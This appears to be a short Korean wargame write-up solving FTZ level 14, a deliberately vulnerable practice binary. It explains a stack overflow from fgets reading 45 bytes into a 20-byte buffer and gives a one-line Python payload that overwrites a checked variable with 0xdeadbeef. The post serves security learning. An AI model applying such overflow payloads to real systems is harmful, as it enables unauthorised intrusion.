어째 갑자기 급 쉬워진 분위기다.
fgets로 45 만큼 입력받는데 정작 배열 크기는 20이다.
디버깅해보면 0x38(56) 만큼 할당해주는데 deadbeef와 비교하는 부분은 ebp-16 부터다.
ebp-56 이 입력받은 문자열 시작 지점이므로
(python -c 'print "A"*40 + "\xef\xbe\xad\xde"';cat) | ./attackme
이런식으로 해주면된다.
'Pwnable > ▷ Study' 카테고리의 다른 글
| ftz level16 (0) | 2018.02.17 |
|---|---|
| ftz level15 (0) | 2018.02.17 |
| ftz level13 (0) | 2018.02.17 |
| ftz level12 (0) | 2018.02.17 |
| ftz level11 (0) | 2018.02.17 |
